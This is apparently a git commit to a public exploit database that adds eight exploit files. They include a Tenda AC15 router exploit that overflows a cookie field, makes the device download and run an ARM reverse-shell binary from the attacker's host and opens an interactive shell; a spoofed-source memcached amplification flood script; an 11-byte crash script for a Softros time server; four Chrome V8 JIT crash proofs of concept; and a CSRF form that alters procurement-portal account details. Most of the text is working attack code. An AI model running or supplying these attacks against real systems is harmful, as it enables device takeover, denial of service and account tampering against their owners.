DB: 2018-03-07
8 changes to exploits/shellcodes Memcached - 'memcrashed' Denial of Service Softros Network Time System Server 2.3.4 - Denial of Service Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_ Chrome V8 JIT - 'GetSpecializationContext' Type Confusion Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read Tenda AC15 Router - Unauthenticated Remote Code Execution Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download Bravo Tejari Web Portal - Cross-Site Request Forgery
This commit is contained in:
parent
6a017b10c8
commit
9897272892
9 changed files with 757 additions and 2 deletions
243
exploits/hardware/remote/44253.py
Executable file
243
exploits/hardware/remote/44253.py
Executable file
|
@ -0,0 +1,243 @@
|
|||
#!/usr/bin/env python
|
||||
# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
|
||||
import urllib2
|
||||
import struct
|
||||
import time
|
||||
import socket
|
||||
from optparse import *
|
||||
import SimpleHTTPServer
|
||||
import SocketServer
|
||||
import threading
|
||||
import sys
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
ARM_REV_SHELL = (
|
||||
"#include <sys/socket.h>\n"
|
||||
"#include <sys/types.h>\n"
|
||||
"#include <string.h>\n"
|
||||
"#include <stdio.h>\n"
|
||||
"#include <netinet/in.h>\n"
|
||||
"int main(int argc, char **argv)\n"
|
||||
"{\n"
|
||||
" struct sockaddr_in addr;\n"
|
||||
" socklen_t addrlen;\n"
|
||||
" int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
|
||||
|
||||
" memset(&addr, 0x00, sizeof(addr));\n"
|
||||
|
||||
" addr.sin_family = AF_INET;\n"
|
||||
" addr.sin_port = htons(%d);\n"
|
||||
" addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
|
||||
|
||||
" int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n"
|
||||
|
||||
" dup2(sock, 0);\n"
|
||||
" dup2(sock, 1);\n"
|
||||
" dup2(sock, 2);\n"
|
||||
|
||||
" system(\"/bin/sh\");\n"
|
||||
"}\n"
|
||||
)
|
||||
|
||||
REV_PORT = 31337
|
||||
HTTPD_PORT = 8888
|
||||
DONE = False
|
||||
|
||||
"""
|
||||
* This function creates a listening socket on port
|
||||
* REV_PORT. When a connection is accepted it updates
|
||||
* the global DONE flag to indicate successful exploitation.
|
||||
* It then jumps into a loop whereby the user can send remote
|
||||
* commands to the device, interacting with a spawned /bin/sh
|
||||
* process.
|
||||
"""
|
||||
def threaded_listener():
|
||||
global DONE
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
|
||||
|
||||
host = ("0.0.0.0", REV_PORT)
|
||||
|
||||
try:
|
||||
s.bind(host)
|
||||
except:
|
||||
print "[+] Error binding to %d" %REV_PORT
|
||||
return -1
|
||||
|
||||
|
||||
print "[+] Connect back listener running on port %d" %REV_PORT
|
||||
|
||||
s.listen(1)
|
||||
conn, host = s.accept()
|
||||
|
||||
#We got a connection, lets make the exploit thread aware
|
||||
DONE = True
|
||||
|
||||
print "[+] Got connect back from %s" %host[0]
|
||||
print "[+] Entering command loop, enter exit to quit"
|
||||
|
||||
#Loop continuosly, simple reverse shell interface.
|
||||
while True:
|
||||
print "#",
|
||||
cmd = raw_input()
|
||||
if cmd == "exit":
|
||||
break
|
||||
if cmd == '':
|
||||
continue
|
||||
|
||||
conn.send(cmd + "\n")
|
||||
|
||||
print conn.recv(4096)
|
||||
|
||||
"""
|
||||
* Take the ARM_REV_SHELL code and modify it with
|
||||
* the given ip and port to connect back to.
|
||||
* This function then compiles the code into an
|
||||
* ARM binary.
|
||||
@Param comp_path – This should be the path of the cross-compiler.
|
||||
@Param my_ip – The IP address of the system running this code.
|
||||
"""
|
||||
def compile_shell(comp_path, my_ip):
|
||||
global ARM_REV_SHELL
|
||||
outfile = open("a.c", "w")
|
||||
|
||||
ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
|
||||
|
||||
outfile.write(ARM_REV_SHELL)
|
||||
outfile.close()
|
||||
|
||||
compile_cmd = [comp_path, "a.c","-o", "a"]
|
||||
|
||||
s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
|
||||
|
||||
while s.poll() == None:
|
||||
continue
|
||||
|
||||
if s.returncode == 0:
|
||||
return True
|
||||
else:
|
||||
print "[x] Error compiling code, check compiler? Read the README?"
|
||||
return False
|
||||
|
||||
"""
|
||||
* This function uses the SimpleHTTPServer module to create
|
||||
* a http server that will serve our malicious binary.
|
||||
* This function is called as a thread, as a daemon process.
|
||||
"""
|
||||
def start_http_server():
|
||||
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
|
||||
httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
|
||||
|
||||
print "[+] Http server started on port %d" %HTTPD_PORT
|
||||
httpd.serve_forever()
|
||||
|
||||
|
||||
"""
|
||||
* This function presents the actual vulnerability exploited.
|
||||
* The Cookie header has a password field that is vulnerable to
|
||||
* a sscanf buffer overflow, we make use of 2 ROP gadgets to
|
||||
* bypass DEP/NX, and can brute force ASLR due to a watchdog
|
||||
* process restarting any processes that crash.
|
||||
* This function will continually make malicious requests to the
|
||||
* devices web interface until the DONE flag is set to True.
|
||||
@Param host – the ip address of the target.
|
||||
@Param port – the port the webserver is running on.
|
||||
@Param my_ip – The ip address of the attacking system.
|
||||
"""
|
||||
def exploit(host, port, my_ip):
|
||||
global DONE
|
||||
url = "http://%s:%s/goform/exeCommand"%(host, port)
|
||||
i = 0
|
||||
|
||||
command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT)
|
||||
|
||||
#Guess the same libc base continuosly
|
||||
libc_base = ****
|
||||
curr_libc = libc_base + (0x7c << 12)
|
||||
|
||||
system = struct.pack("<I", curr_libc + ****)
|
||||
|
||||
#: pop {r3, r4, r7, pc}
|
||||
pop = struct.pack("<I", curr_libc + ****)
|
||||
#: mov r0, sp ; blx r3
|
||||
mv_r0_sp = struct.pack("<I", curr_libc + ****)
|
||||
|
||||
password = "A"*offset
|
||||
password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
|
||||
|
||||
print "[+] Beginning brute force."
|
||||
while not DONE:
|
||||
i += 1
|
||||
print "[+] Attempt %d" %i
|
||||
|
||||
#build the request, with the malicious password field
|
||||
req = urllib2.Request(url)
|
||||
req.add_header("Cookie", "password=%s"%password)
|
||||
|
||||
#The request will throw an exception when we crash the server,
|
||||
#we don't care about this, so don't handle it.
|
||||
try:
|
||||
resp = urllib2.urlopen(req)
|
||||
except:
|
||||
pass
|
||||
|
||||
#Give the device some time to restart the
|
||||
time.sleep(1)
|
||||
|
||||
print "[+] Exploit done"
|
||||
|
||||
|
||||
def main():
|
||||
parser = OptionParser()
|
||||
parser.add_option("-t", "–target", dest="host_ip", help="IP address of the target")
|
||||
parser.add_option("-p", "–port", dest="host_port", help="Port of the targets webserver")
|
||||
parser.add_option("-c", "–comp-path", dest="compiler_path", help="path to arm cross compiler")
|
||||
parser.add_option("-m", "–my-ip", dest="my_ip", help="your ip address")
|
||||
|
||||
options, args = parser.parse_args()
|
||||
|
||||
host_ip = options.host_ip
|
||||
host_port = options.host_port
|
||||
comp_path = options.compiler_path
|
||||
my_ip = options.my_ip
|
||||
|
||||
if host_ip == None or host_port == None:
|
||||
parser.error("[x] A target ip address (-t) and port (-p) are required")
|
||||
|
||||
if comp_path == None:
|
||||
parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")
|
||||
|
||||
if my_ip == None:
|
||||
parser.error("[x] Please pass your ip address (-m)")
|
||||
|
||||
|
||||
if not compile_shell(comp_path, my_ip):
|
||||
print "[x] Exiting due to error in compiling shell"
|
||||
return -1
|
||||
|
||||
httpd_thread = threading.Thread(target=start_http_server)
|
||||
httpd_thread.daemon = True
|
||||
httpd_thread.start()
|
||||
|
||||
conn_listener = threading.Thread(target=threaded_listener)
|
||||
conn_listener.start()
|
||||
|
||||
#Give the thread a little time to start up, and fail if that happens
|
||||
time.sleep(3)
|
||||
|
||||
if not conn_listener.is_alive():
|
||||
print "[x] Exiting due to conn_listener error"
|
||||
return -1
|
||||
|
||||
|
||||
exploit(host_ip, host_port, my_ip)
|
||||
|
||||
|
||||
conn_listener.join()
|
||||
|
||||
return 0
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
90
exploits/linux/dos/44254.py
Executable file
90
exploits/linux/dos/44254.py
Executable file
|
@ -0,0 +1,90 @@
|
|||
# Written by Alex Conrey
|
||||
# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44254.zip
|
||||
#
|
||||
# This program is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# This was created to better understand the memcrashed exploit
|
||||
# brought to light thanks to CloudFlare.
|
||||
# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
|
||||
#
|
||||
# Please sysadmin responsibly.
|
||||
|
||||
import requests
|
||||
import memcache
|
||||
import re
|
||||
|
||||
from scapy.all import *
|
||||
|
||||
# Vulnerable memcached server list
|
||||
SERVER_LIST = [
|
||||
'172.17.0.2:11211',
|
||||
]
|
||||
|
||||
# Destination
|
||||
TARGET = '1.2.3.4'
|
||||
|
||||
# optional payload to set if no keys exist
|
||||
payload = requests.get('https://google.com').text
|
||||
payload_key = 'fuckit'
|
||||
|
||||
# this forces payload to load into memory for being extra-evil and efficient
|
||||
if not payload:
|
||||
print 'Could not import payload, continuing anyway'
|
||||
|
||||
try:
|
||||
for server in SERVER_LIST:
|
||||
if ':' in server:
|
||||
server = server.split(':')[0]
|
||||
|
||||
ip = IP(src=TARGET, dst=server)
|
||||
packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
|
||||
|
||||
# fetch known keys by id
|
||||
statitems_packet = packet_base.format('stats items')
|
||||
udp = UDP(sport=50000, dport=11211)/statitems_packet
|
||||
keyids = []
|
||||
resp = sr1(ip/udp)
|
||||
for key in str(resp.payload).split('\r\n'):
|
||||
# Skip first line which has hex in it (I'm lazy)
|
||||
if 'age' in key:
|
||||
key = key.split(':')[1]
|
||||
keyids.append(key)
|
||||
|
||||
# fetch names for keys by id
|
||||
keys = []
|
||||
for kid in keyids:
|
||||
query = 'stats cachedump {0} 100'.format(kid)
|
||||
keyid_packet = packet_base.format(query)
|
||||
udp = UDP(sport=50000, dport=11211)/keyid_packet
|
||||
resp = str(sr1(ip/udp).payload).split('\r\n')
|
||||
for key in resp:
|
||||
if 'ITEM' in key:
|
||||
res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
|
||||
keys.append(res.group('keyname'))
|
||||
|
||||
# if keys not present on target, make one
|
||||
if not keys:
|
||||
mc = memcache.Client([server],debug=False)
|
||||
mc.set(payload_key, payload)
|
||||
keys.append(payload_key)
|
||||
|
||||
# iterate thru known keys and blast away
|
||||
for key in keys:
|
||||
query = 'get {0}'.format(key)
|
||||
fun_packet = packet_base.format(query)
|
||||
udp = UDP(sport=50000, dport=11211)/fun_packet
|
||||
sr1(ip/udp)
|
||||
|
||||
except Exception:
|
||||
raise
|
72
exploits/multiple/dos/44257.js
Normal file
72
exploits/multiple/dos/44257.js
Normal file
|
@ -0,0 +1,72 @@
|
|||
/*
|
||||
I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/#F0
|
||||
|
||||
Here's a snippet.
|
||||
case IrOpcode::kStoreField: {
|
||||
FieldAccess access = FieldAccessOf(node->op());
|
||||
Node* value_node = node->InputAt(1);
|
||||
NodeInfo* input_info = GetInfo(value_node);
|
||||
MachineRepresentation field_representation =
|
||||
access.machine_type.representation();
|
||||
|
||||
// Make sure we convert to Smi if possible. This should help write
|
||||
// barrier elimination.
|
||||
if (field_representation == MachineRepresentation::kTagged &&
|
||||
TypeOf(value_node)->Is(Type::SignedSmall())) {
|
||||
field_representation = MachineRepresentation::kTaggedSigned;
|
||||
}
|
||||
WriteBarrierKind write_barrier_kind = WriteBarrierKindFor(
|
||||
access.base_is_tagged, field_representation, access.offset,
|
||||
access.type, input_info->representation(), value_node);
|
||||
|
||||
ProcessInput(node, 0, UseInfoForBasePointer(access));
|
||||
ProcessInput(node, 1,
|
||||
TruncatingUseInfoFromRepresentation(field_representation));
|
||||
ProcessRemainingInputs(node, 2);
|
||||
SetOutput(node, MachineRepresentation::kNone);
|
||||
if (lower()) {
|
||||
if (write_barrier_kind < access.write_barrier_kind) {
|
||||
access.write_barrier_kind = write_barrier_kind;
|
||||
NodeProperties::ChangeOp(
|
||||
node, jsgraph_->simplified()->StoreField(access));
|
||||
}
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
Since Smi stores can be performed without write barriers, if it's possible to convert to Smi, it tries to help write barrier elimination by changing field_representation to MachineRepresentation::kTaggedSigned as noted in the comment. But whether or not field_representation has changed, it uses TruncatingUseInfoFromRepresentation to process the value node.
|
||||
|
||||
But TruncatingUseInfoFromRepresentation(kTaggedSigned) returns UseInfo::AnyTagged() which is also compatible with kTaggedPointer. So even in the case where input_info->representation() is kTaggedPointer and the value is a heap object, it may eliminate the write barrier.
|
||||
|
||||
Note: It's the same when handling kStoreElement.
|
||||
|
||||
PoC 1 using kStoreField.
|
||||
*/
|
||||
|
||||
var a, b; // should be var
|
||||
for (var i = 0; i < 100000; i++) {
|
||||
b = 1;
|
||||
a = i + -0; // -0 is a number, so this will make "a" a heap object.
|
||||
b = a;
|
||||
}
|
||||
|
||||
print(a === b); // true
|
||||
gc();
|
||||
print(a === b); // false
|
||||
print(b);
|
||||
|
||||
/*
|
||||
PoC 2 using kStoreElement.
|
||||
let arr = [{}];
|
||||
var v; // should be var
|
||||
for (var i = 0; i < 700000; i++) {
|
||||
arr[0] = 1;
|
||||
v = i + -0;
|
||||
arr[0] = v;
|
||||
}
|
||||
|
||||
print(arr[0] === v) // true
|
||||
gc();
|
||||
print(arr[0] === v) // false
|
||||
print(arr[0]);
|
||||
*/
|
31
exploits/multiple/dos/44258.js
Normal file
31
exploits/multiple/dos/44258.js
Normal file
|
@ -0,0 +1,31 @@
|
|||
/*
|
||||
I think this commit has introduced the bug.
|
||||
https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
|
||||
|
||||
According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
|
||||
|
||||
The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
|
||||
if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
|
||||
return NoChange();
|
||||
}
|
||||
instance_map = Map::GetObjectCreateMap(prototype_const);
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
var object;
|
||||
function opt() {
|
||||
opt['x'] = 1.1;
|
||||
try {
|
||||
Object.create(object);
|
||||
} catch (e) {
|
||||
}
|
||||
|
||||
for (let i = 0; i < 1000000; i++) {
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
opt();
|
||||
object = opt;
|
||||
opt();
|
47
exploits/multiple/dos/44259.js
Normal file
47
exploits/multiple/dos/44259.js
Normal file
|
@ -0,0 +1,47 @@
|
|||
PoC:
|
||||
function* opt(arg = () => arg) {
|
||||
let tmp = opt.x; // LdaNamedProperty
|
||||
for (;;) {
|
||||
arg;
|
||||
yield;
|
||||
|
||||
function inner() {
|
||||
tmp;
|
||||
}
|
||||
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
for (let i = 0; i < 100000; i++) {
|
||||
opt();
|
||||
}
|
||||
|
||||
/*
|
||||
PoC for release build:
|
||||
function* opt(arg = () => {
|
||||
arg;
|
||||
this;
|
||||
}, opt) {
|
||||
let tmp = arg.x;
|
||||
for (;;) {
|
||||
arg;
|
||||
yield;
|
||||
|
||||
tmp = {
|
||||
inner() {
|
||||
tmp;
|
||||
}
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
for (let i = 0; i < 10000; i++) {
|
||||
opt();
|
||||
}
|
||||
|
||||
What happened:
|
||||
1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
|
||||
2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
|
||||
3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
|
||||
*/
|
57
exploits/multiple/dos/44260.js
Normal file
57
exploits/multiple/dos/44260.js
Normal file
|
@ -0,0 +1,57 @@
|
|||
/*
|
||||
In the current implementation, the bytecode generator also emits empty jump tables.
|
||||
https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89
|
||||
|
||||
So the bytecode for the example code would be generated as follows:
|
||||
Code:
|
||||
function* opt() {
|
||||
for (;;)
|
||||
if (true) {
|
||||
|
||||
} else {
|
||||
yield; // never reaches, never hits BindJumpTableEntry
|
||||
}
|
||||
}
|
||||
|
||||
Bytecode:
|
||||
...
|
||||
0x35dda532a2a5 @ 75 : 90 04 01 01 SwitchOnSmiNoFeedback [4], [1], [1] { } <<--- SIZE: 1, but EMPTY
|
||||
...
|
||||
|
||||
|
||||
Here's a snippet of JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid which is used to enumerate a jump table.
|
||||
void JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid() {
|
||||
if (table_offset_ >= table_end_) return;
|
||||
|
||||
current_ = accessor_->GetConstantAtIndex(table_offset_);
|
||||
Isolate* isolate = accessor_->bytecode_array()->GetIsolate();
|
||||
while (current_->IsTheHole(isolate)) {
|
||||
++table_offset_;
|
||||
++index_;
|
||||
current_ = accessor_->GetConstantAtIndex(table_offset_);
|
||||
}
|
||||
}
|
||||
|
||||
If the jump table is empty, table_offset_ may exceed table_end_. As a result, out-of-bounds reads occur.
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
function* opt() {
|
||||
for (;;)
|
||||
if (true) {
|
||||
|
||||
} else {
|
||||
yield;
|
||||
}
|
||||
|
||||
for (;;)
|
||||
if (true) {
|
||||
|
||||
} else {
|
||||
yield; yield; yield; yield; yield; yield; yield; yield;
|
||||
}
|
||||
}
|
||||
|
||||
for (let i = 0; i < 100000; i++)
|
||||
opt();
|
98
exploits/multiple/webapps/44256.html
Normal file
98
exploits/multiple/webapps/44256.html
Normal file
|
@ -0,0 +1,98 @@
|
|||
Exploit Title: Bravo Tejari Web Portal-CSRF
|
||||
CVE-ID: CVE-2018-7216
|
||||
Vulnerability Type: Cross Site Request Forgery (CSRF)
|
||||
Vendor of Product: Tejari
|
||||
Affected Product Code Base: Bravo Solution
|
||||
Affected Component: Web Interface Management.
|
||||
Attack Type: Local - Authenticated
|
||||
Impact: Unauthorised Access
|
||||
Category: WebApps
|
||||
Author: Arvind V.
|
||||
Author Social: @Find_Arvind
|
||||
|
||||
Vulnerability Type: Cross Site Request Forgery (CSRF)
|
||||
Vendor of Product: Tejari
|
||||
Affected Product Code Base: Bravo Solution
|
||||
Affected Component: Web Interface Management.
|
||||
Attack Type: Local - Authenticated
|
||||
Impact: Unauthorised Access
|
||||
|
||||
Product description:
|
||||
Bravo Tejari is a strategic procurement platform that enables organizations
|
||||
to generate more value, influence innovation and reduce risk powered by a
|
||||
unique supplier-centered approach that integrates supplier lifetime value
|
||||
throughout the entire procurement process
|
||||
|
||||
Attack Scenario:
|
||||
The Web Interface of the Bravo Tejari procurement portal does not use
|
||||
random tokens to block any kind of forged requests. An atacker can take
|
||||
advantage of this scenario and create a forged request to edit user account
|
||||
details like name, address of the company/individual, email address etc. He
|
||||
then uses social engineering techniques to target specific individuals
|
||||
whose account details he would like to change. He simply sends the link and
|
||||
tricks the user into clicking the forged http request. The request is
|
||||
executed and user account details are changed without his knowledge.
|
||||
|
||||
Proof of Concept Code:
|
||||
Forged HTTP Request used by the attacker:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://XXXX.XXXX.com/esop/toolkit/profile/regData.do"
|
||||
method="POST">
|
||||
<input type="hidden" name="userAct" value="confirmData" />
|
||||
<input type="hidden" name="from" value="registration_data" />
|
||||
<input type="hidden" name="actionNumber" value="0" />
|
||||
<input type="hidden" name="companyExtStatusCode" value="31" />
|
||||
<input type="hidden" name="companyExtStatusNote" value="" />
|
||||
<input type="hidden" name="hideCompany" value="false" />
|
||||
<input type="hidden" name="companyName"
|
||||
value="XYZ COMPUTER SYSTEMS FZ LLC" />
|
||||
<input type="hidden" name="companyAddress"
|
||||
value="Dubai internet city, DUBAI" />
|
||||
<input type="hidden" name="companyCity" value="DUBAI" />
|
||||
<input type="hidden" name="companyCountry" value="AE" />
|
||||
<input type="hidden" name="companyProvince" value="Dubai" />
|
||||
<input type="hidden" name="companyZip" value="25703" />
|
||||
<input type="hidden" name="companyPhone" value="43918600" />
|
||||
<input type="hidden" name="companyFax" value="" />
|
||||
<input type="hidden" name="companyEmail"
|
||||
value="XYZ.v@XYZ.com" />
|
||||
<input type="hidden" name="companyWebSite" value="" />
|
||||
<input type="hidden" name="companyLegalStructure" value="" />
|
||||
<input type="hidden" name="companyAddress2" value="" />
|
||||
<input type="hidden" name="companyFiscalCode" value="215703" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Impact:
|
||||
The affected product is a procurement portal and so all communication
|
||||
regarding the contract lifecycle process is sent to user details provided
|
||||
on the portal. If this vulnerability is sucessfully exploited, the attacker
|
||||
will be able to change these details which will potentially affect the
|
||||
victim's business.
|
||||
|
||||
Recommendation:
|
||||
Ensure that all sensitive CRUD Operations are appropriately protected with
|
||||
random tokens. Alternatively, the sensitive operations should also have an
|
||||
authentication layer to confirm user verification.
|
||||
|
||||
References:
|
||||
http://seclists.org/fulldisclosure/2018/Feb/44
|
||||
https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html
|
||||
|
||||
https://www.securityfocus.com/archive/1/541782/30/0/threaded
|
||||
|
||||
Credit: Arvind Vishwakarma
|
||||
http://ultimateone1.blogspot.ae/
|
||||
|
||||
|
||||
|
||||
Vulnerability Timeline:
|
||||
12th December 2017 – Vulnerability Discovered
|
||||
23rd December 2017 – Contacted Vendor – No Response
|
||||
7th January 2018 – Contacted Vendor again – No Response
|
||||
15th February 2018 – Vulnerability Disclosed
|
109
exploits/windows/dos/44255.txt
Normal file
109
exploits/windows/dos/44255.txt
Normal file
|
@ -0,0 +1,109 @@
|
|||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
|
||||
[+] ISR: Apparition Security
|
||||
|
||||
|
||||
Vendor:
|
||||
=============
|
||||
www.softros.com
|
||||
https://nts.softros.com/downloads/
|
||||
|
||||
|
||||
Product:
|
||||
===========
|
||||
Network Time System Server v2.3.4
|
||||
Both x86/x64 versions
|
||||
|
||||
|
||||
Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
|
||||
virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
|
||||
maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
|
||||
routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
|
||||
establishing an interconnected time synchronization system for each and every machine and device on the company network.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Denial Of Service
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2018-7658
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
|
||||
Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization
|
||||
could then potentially be impacted.
|
||||
|
||||
|
||||
Stack dump:
|
||||
|
||||
'''
|
||||
eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
|
||||
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
|
||||
NTSServerSvc+0x69a5:
|
||||
004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=??
|
||||
Resetting default scope
|
||||
|
||||
FAULTING_IP:
|
||||
NTSServerSvc+69a5
|
||||
004069a5 880a mov byte ptr [edx],cl
|
||||
|
||||
EXCEPTION_RECORD: (.exr -1)
|
||||
ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
|
||||
ExceptionCode: c0000005 (Access violation)
|
||||
|
||||
'''
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
=============
|
||||
import socket
|
||||
#Network Time System (Server) NTSServerSvc.exe v2.3.4
|
||||
#Softros Systems
|
||||
#NTS Server service for time synchronization over network
|
||||
|
||||
print 'Network Time Server 11 byte Denial Of Service'
|
||||
print 'by hyp3rlinx'
|
||||
HOST=raw_input('Network Time Server IP')
|
||||
PORT=7001
|
||||
payload='A'*11
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.connect((HOST,PORT))
|
||||
s.send(payload)
|
||||
s.close()
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
Medium
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: February 10, 2018
|
||||
Second attempt : February 24, 2018
|
||||
Request CVE, assigned by Mitre : March 3, 2018
|
||||
March 5, 2018: Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
|
@ -5890,6 +5890,12 @@ id,file,description,date,author,type,platform,port
|
|||
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
|
||||
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
|
||||
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
|
||||
44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
|
||||
44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
|
||||
44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
|
||||
44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
|
||||
44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
|
||||
44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -16299,6 +16305,7 @@ id,file,description,date,author,type,platform,port
|
|||
